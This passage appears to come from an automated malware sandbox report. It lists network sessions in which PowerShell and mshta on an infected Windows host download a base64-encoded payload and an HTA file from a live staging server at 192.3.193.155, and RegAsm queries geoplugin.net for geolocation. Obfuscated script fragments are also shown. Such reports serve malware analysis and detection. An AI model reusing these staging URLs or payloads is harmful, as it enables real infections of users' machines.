                                                      Data Raw: ff fe 0d 00 0a 00 50 00 43 00 41 00 7a 00 62 00 4c 00 4c 00 50 00 7a 00 69 00 20 00 3d 00 20 00 22 00 6a 00 65 00 69 00 47 00 57 00 52 00 57 00 6f 00 4b 00 63 00 22 00 0d 00 0a 00 74 00 63 00 48 00 63 00 5a 00 6b 00 74 00 42 00 57 00 52 00 20 00 3d 00 20 00 22 00 4b 00 57 00 65 00 78 00 7a 00 41 00 47 00 63 00 4c 00 72 00 22 00 0d 00 0a 00 57 00 57 00 57 00 54 00 53 00 69 00 53 00 50 00 71 00 69 00 20 00 3d 00 20 00 22 00 70 00 73 00 6e 00 69 00 5a 00 63 00 61 00 4b 00 69 00 41 00 22 00 0d 00 0a 00 65 00 42 00 6d 00 6a 00 5a 00 42 00 72 00 48 00 6b 00 57 00 20 00 3d 00 20 00 22 00 42 00 63 00 6f 00 6b 00 5a 00 74 00 42 00 57 00 52 00 74 00 22 00 0d 00 0a 00 62 00 70 00 41 00 4c 00 5a 00 42 00 47 00 43 00 63 00 70 00 20 00 3d 00 20 00 22 00 6f 00 57 00 57 00 5a 00 6b 00 47 00 64 00 4b 00 70 00 54 00 22 00 0d 00 0a 00 4c 00 5a 00 41 00 4c 00 75 00 69 00 48 00 78 00 70 00 47 00 20 00 3d 00 20 00 22 00 57 00 43 00 68 00 70 00 4c 00 57 00 4b 00 61 00 57 00 47 00 22 00 0d 00 0a 00 4c 00 70 00 53 00 49 00 [TRUNCATED]
                                                      Data Ascii: PCAzbLLPzi = "jeiGWRWoKc"tcHcZktBWR = "KWexzAGcLr"WWWTSiSPqi = "psniZcaKiA"eBmjZBrHkW = "BcokZtBWRt"bpALZBGCcp = "oWWZkGdKpT"LZALuiHxpG = "WChpLWKaWG"LpSIzkOdLt = "WZKAUidUKb"ANcHiUGnPp = "dUeQecPbLN"QNKGhCOtKH = "tneALQfKGu"sLirzLbZmh = "LHfNfpcqin"KZuKmcLmjW = "ifPZuluWRk"zqmAKGtmhm = "znzdWklLLd"LBmOxffBcL = "CixSfvWkbs"GtUnoLOhci = "nSJWZfvdxT"GLtLWRJKAK = "iWPAItbcWu"kNUUGNpboQ = "mLkULNNALb"cLibQGZLQK = "OcRczBPCT
                                                      Aug 28, 2024 06:56:36.286957979 CEST1236INData Raw: 6e 00 22 00 0d 00 0a 00 0d 00 0a 00 68 00 57 00 48 00 73 00 64 00 48 00 67 00 70 00 74 00 65 00 20 00 3d 00 20 00 22 00 75 00 55 00 65 00 69 00 52 00 52 00 52 00 57 00 75 00 64 00 22 00 0d 00 0a 00 4f 00 75 00 66 00 63 00 4c 00 48 00 6f 00 43 00
                                                      Data Ascii: n"hWHsdHgpte = "uUeiRRRWud"OufcLHoCrm = "vLtaKdNqQK"RUuTkKuLOW = "oBNWWWLhZA"fnQcGxPbma = "KLKiikKLWz"BuWfgAca
                                                      Aug 28, 2024 06:56:36.286967039 CEST1236INData Raw: 20 00 22 00 66 00 4c 00 4c 00 65 00 65 00 6e 00 49 00 4b 00 74 00 68 00 22 00 0d 00 0a 00 7a 00 4c 00 47 00 74 00 6b 00 57 00 6e 00 76 00 78 00 55 00 20 00 3d 00 20 00 22 00 4c 00 57 00 4b 00 57 00 4c 00 57 00 4b 00 4b 00 69 00 57 00 22 00 0d 00
                                                      Data Ascii: "fLLeenIKth"zLGtkWnvxU = "LWKWLWKKiW"ggLLGKIJmW = "cPGUkzLamA"eLBKLfmGbW = "WBePUOPzob"cLbuGNkNiW = "OkKZRoKeUG"
                                                      Aug 28, 2024 06:56:36.286978960 CEST1236INData Raw: 52 00 57 00 62 00 43 00 52 00 68 00 65 00 20 00 3d 00 20 00 22 00 4e 00 7a 00 50 00 64 00 4c 00 72 00 63 00 68 00 4b 00 6d 00 22 00 0d 00 0a 00 63 00 6e 00 66 00 74 00 57 00 62 00 4f 00 65 00 4c 00 43 00 20 00 3d 00 20 00 22 00 69 00 61 00 4b 00
                                                      Data Ascii: RWbCRhe = "NzPdLrchKm"cnftWbOeLC = "iaKzcBIPKa"caLrHBKZiq = "CWLzaocLWR"KKZUAoaLmL = "KjRLfbGNkW"urLpeJSfoW = "KLu
                                                      Aug 28, 2024 06:56:36.286988974 CEST1236INData Raw: 73 00 22 00 0d 00 0a 00 49 00 66 00 75 00 64 00 57 00 4c 00 75 00 42 00 62 00 74 00 20 00 3d 00 20 00 22 00 6f 00 72 00 57 00 76 00 4b 00 74 00 68 00 6b 00 63 00 4e 00 22 00 0d 00 0a 00 4e 00 73 00 67 00 63 00 74 00 57 00 4b 00 57 00 63 00 47 00
                                                      Data Ascii: s"IfudWLuBbt = "orWvKthkcN"NsgctWKWcG = "zpKcPWLaiW"bGTLokCKks = "ALvtAAASLd"cJoLWhxxAU = "LWPAWZWKbk"cWCiiWkW
                                                      Aug 28, 2024 06:56:36.286998987 CEST1236INData Raw: 6c 00 66 00 47 00 6d 00 6b 00 70 00 55 00 65 00 57 00 4e 00 22 00 0d 00 0a 00 6b 00 69 00 4b 00 47 00 69 00 4e 00 63 00 4e 00 76 00 63 00 20 00 3d 00 20 00 22 00 6b 00 47 00 41 00 52 00 4b 00 4c 00 4c 00 6b 00 69 00 64 00 22 00 0d 00 0a 00 62 00
                                                      Data Ascii: lfGmkpUeWN"kiKGiNcNvc = "kGARKLLkid"bKLWCZdnPO = "fWWGkZiWZO"SKKCKKpjck = "LCNaIWJKzz"xWiPebWLPO = "cLILoiGzlc"G
                                                      Aug 28, 2024 06:56:36.287012100 CEST1236INData Raw: 4e 00 74 00 73 00 20 00 3d 00 20 00 22 00 4c 00 41 00 55 00 6e 00 49 00 6b 00 63 00 4f 00 47 00 4b 00 22 00 0d 00 0a 00 69 00 43 00 4c 00 65 00 61 00 50 00 6e 00 57 00 6d 00 6f 00 20 00 3d 00 20 00 22 00 70 00 6e 00 65 00 5a 00 57 00 69 00 55 00
                                                      Data Ascii: Nts = "LAUnIkcOGK"iCLeaPnWmo = "pneZWiUcTR"UobcZLahBP = "cLpNieKfUf"UqfhcbuAGd = "kOdiGWUfnp"blAKAzecLB = "mcOWUWR
                                                      Aug 28, 2024 06:56:36.287086964 CEST1236INData Raw: 62 00 57 00 55 00 66 00 67 00 69 00 62 00 66 00 4c 00 47 00 20 00 3d 00 20 00 22 00 6b 00 41 00 71 00 69 00 49 00 50 00 4a 00 6d 00 55 00 41 00 22 00 0d 00 0a 00 55 00 6e 00 4c 00 47 00 57 00 4a 00 57 00 6a 00 65 00 70 00 20 00 3d 00 20 00 22 00
                                                      Data Ascii: bWUfgibfLG = "kAqiIPJmUA"UnLGWJWjep = "JGcRPKtszu"nriPoKWRok = "SLdkANbmGc"fRchCtWKiH = "ecKjxiLWZP"ijHcfOxhih =
                                                      Aug 28, 2024 06:56:36.287111044 CEST1236INData Raw: 4b 00 4c 00 6e 00 54 00 55 00 4e 00 22 00 0d 00 0a 00 57 00 55 00 63 00 47 00 4c 00 4c 00 4c 00 74 00 62 00 4a 00 20 00 3d 00 20 00 22 00 75 00 62 00 4b 00 57 00 73 00 4c 00 4c 00 63 00 4a 00 54 00 22 00 0d 00 0a 00 0d 00 0a 00 76 00 43 00 47 00
                                                      Data Ascii: KLnTUN"WUcGLLLtbJ = "ubKWsLLcJT"vCGiZOeLhe = "WZpUcSacaf"GpiiNCLhmW = "jbNqiPkCnS"cdkRTioGic = "pCWiUhoZZK"mKi
                                                      Aug 28, 2024 06:56:36.287122011 CEST1236INData Raw: 63 00 51 00 66 00 65 00 47 00 20 00 3d 00 20 00 22 00 7a 00 41 00 4a 00 70 00 4c 00 7a 00 4b 00 63 00 4c 00 55 00 22 00 0d 00 0a 00 75 00 75 00 69 00 76 00 55 00 55 00 47 00 61 00 63 00 6d 00 20 00 3d 00 20 00 22 00 4c 00 63 00 69 00 66 00 57 00
                                                      Data Ascii: cQfeG = "zAJpLzKcLU"uuivUUGacm = "LcifWWmtAT"LkNIUUWekj = "KRgLWLWWup"AoiCZLLUer = "LnqcOPGtLv"iUdhiceKzh = "CxGig
                                                      Aug 28, 2024 06:56:36.292040110 CEST1236INData Raw: 69 00 61 00 6d 00 22 00 0d 00 0a 00 4c 00 50 00 61 00 6c 00 4c 00 57 00 5a 00 6e 00 4b 00 55 00 20 00 3d 00 20 00 22 00 65 00 76 00 4a 00 74 00 66 00 55 00 70 00 6a 00 4b 00 71 00 22 00 0d 00 0a 00 68 00 76 00 68 00 43 00 42 00 70 00 47 00 55 00
                                                      Data Ascii: iam"LPalLWZnKU = "evJtfUpjKq"hvhCBpGUOk = "QImrHLhecf"LSOBPGHCLA = "mPWkNiKzki"LschApKLaW = "WdtivUNBGf"GiJWmAiT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.2249169192.3.193.155802848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 28, 2024 06:56:43.843759060 CEST81OUTGET /xampp/boz/REDS.txt HTTP/1.1
                                                      Host: 192.3.193.155
                                                      Connection: Keep-Alive
                                                      Aug 28, 2024 06:56:44.322316885 CEST1236INHTTP/1.1 200 OK
                                                      Date: Wed, 28 Aug 2024 04:56:44 GMT
                                                      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                                                      Last-Modified: Wed, 28 Aug 2024 01:12:17 GMT
                                                      ETag: "a1000-620b40c95ea2b"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 659456
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/plain
                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv
                                                      Aug 28, 2024 06:56:44.322334051 CEST224INData Raw: 34 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67
                                                      Data Ascii: 4gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW
                                                      Aug 28, 2024 06:56:44.322477102 CEST1236INData Raw: 31 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77
                                                      Data Ascii: 1AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZ
                                                      Aug 28, 2024 06:56:44.322490931 CEST1236INData Raw: 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a
                                                      Data Ascii: EnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD
                                                      Aug 28, 2024 06:56:44.322506905 CEST1236INData Raw: 36 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51
                                                      Data Ascii: 6wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gY
                                                      Aug 28, 2024 06:56:44.322515965 CEST1236INData Raw: 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b
                                                      Data Ascii: EkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQOD
                                                      Aug 28, 2024 06:56:44.322525978 CEST896INData Raw: 2f 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d
                                                      Data Ascii: /o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6Uc
                                                      Aug 28, 2024 06:56:44.322536945 CEST1236INData Raw: 31 67 5a 4e 4b 57 54 65 31 77 57 4e 68 56 54 49 31 77 41 4e 34 54 44 37 30 4d 4b 4e 6a 52 44 55 30 34 43 4e 49 4d 54 35 7a 77 35 4d 58 4f 54 6b 7a 77 34 4d 61 4e 7a 44 79 67 75 4d 30 4b 6a 49 79 38 51 4d 5a 48 6a 6f 78 30 57 4d 6b 46 6a 56 78 45
                                                      Data Ascii: 1gZNKWTe1wWNhVTI1wAN4TD70MKNjRDU04CNIMT5zw5MXOTkzw4MaNzDyguM0KjIy8QMZHjox0WMkFjVxEUMRAj+w8OMbDD0wsMMqCTfAAAAwCABwDgPr5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYP
                                                      Aug 28, 2024 06:56:44.322550058 CEST1236INData Raw: 38 30 7a 4c 39 51 43 50 31 7a 7a 31 38 49 4e 50 4e 7a 6a 77 38 59 4b 50 43 79 7a 54 38 6f 45 50 46 78 6a 4f 38 6b 77 4f 6c 76 44 34 37 73 39 4f 51 76 44 74 37 30 35 4f 43 75 54 66 37 67 33 4f 74 74 54 55 37 45 30 4f 67 73 7a 47 37 59 78 4f 4c 6f
                                                      Data Ascii: 80zL9QCP1zz18INPNzjw8YKPCyzT8oEPFxjO8kwOlvD47s9OQvDt705OCuTf7g3OttTU7E0OgszG7YxOLoT66ctO5qDt68qOkqDi6MnOJpDR68jO0oDG64QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj
                                                      Aug 28, 2024 06:56:44.322560072 CEST1236INData Raw: 41 51 41 49 41 73 7a 59 34 55 78 4e 34 66 6a 70 33 41 6b 4e 6f 55 7a 61 31 49 54 4e 4d 51 44 30 7a 4d 2f 4d 42 49 44 30 79 49 54 4d 74 48 6a 75 78 67 57 4d 37 45 6a 44 77 77 46 41 41 41 41 4d 41 51 41 45 41 41 41 41 2f 63 36 50 33 35 54 4b 39 49
                                                      Data Ascii: AQAIAszY4UxN4fjp3AkNoUza1ITNMQD0zM/MBID0yITMtHjuxgWM7EjDwwFAAAAMAQAEAAAA/c6P35TK9IePH2Te7EkO1lTS4kLOTijd3QoNeazN2QSNxXTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gK
                                                      Aug 28, 2024 06:56:44.327753067 CEST1236INData Raw: 69 47 44 6e 78 59 5a 4d 51 47 7a 69 78 55 59 4d 2f 46 54 65 78 51 58 4d 75 46 44 61 78 49 57 4d 64 46 7a 56 78 45 56 4d 4c 46 6a 52 78 41 55 4d 36 45 44 4e 78 38 53 4d 70 45 7a 49 78 30 52 4d 59 45 6a 45 78 77 51 4d 47 45 54 41 77 73 50 4d 31 44
                                                      Data Ascii: iGDnxYZMQGzixUYM/FTexQXMuFDaxIWMdFzVxEVMLFjRxAUM6EDNx8SMpEzIx0RMYEjExwQMGETAwsPM1Dz7woOMkDj3wgNMTDTzwcMMBDDvwYLMwCjqwUKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+z


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.2249172178.237.33.50803024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 28, 2024 06:56:47.243263006 CEST71OUTGET /json.gp HTTP/1.1
                                                      Host: geoplugin.net
                                                      Cache-Control: no-cache
                                                      Aug 28, 2024 06:56:47.844196081 CEST1170INHTTP/1.1 200 OK
                                                      date: Wed, 28 Aug 2024 04:56:47 GMT
                                                      server: Apache
                                                      content-length: 962
                                                      content-type: application/json; charset=utf-8
                                                      cache-control: public, max-age=300
                                                      access-control-allow-origin: *
                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.2249175192.3.193.155801960C:\Windows\System32\mshta.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 28, 2024 06:56:50.112591982 CEST469OUTGET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      If-Modified-Since: Wed, 28 Aug 2024 01:17:45 GMT
                                                      Connection: Keep-Alive
                                                      Host: 192.3.193.155
                                                      If-None-Match: "1ccb3-620b4202337ba"
                                                      Aug 28, 2024 06:56:50.218367100 CEST276INHTTP/1.1 304 Not Modified
                                                      Date: Wed, 28 Aug 2024 04:56:50 GMT
                                                      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                                                      Last-Modified: Wed, 28 Aug 2024 01:17:45 GMT
                                                      ETag: "1ccb3-620b4202337ba"
                                                      Accept-Ranges: bytes
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.2249177192.3.193.155804016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 28, 2024 06:57:03.082536936 CEST81OUTGET /xampp/boz/REDS.txt HTTP/1.1
                                                      Host: 192.3.193.155
                                                      Connection: Keep-Alive
                                                      Aug 28, 2024 06:57:03.553361893 CEST1236INHTTP/1.1 200 OK
                                                      Date: Wed, 28 Aug 2024 04:57:03 GMT
                                                      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                                                      Last-Modified: Wed, 28 Aug 2024 01:12:17 GMT
                                                      ETag: "a1000-620b40c95ea2b"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 659456
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/plain
                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
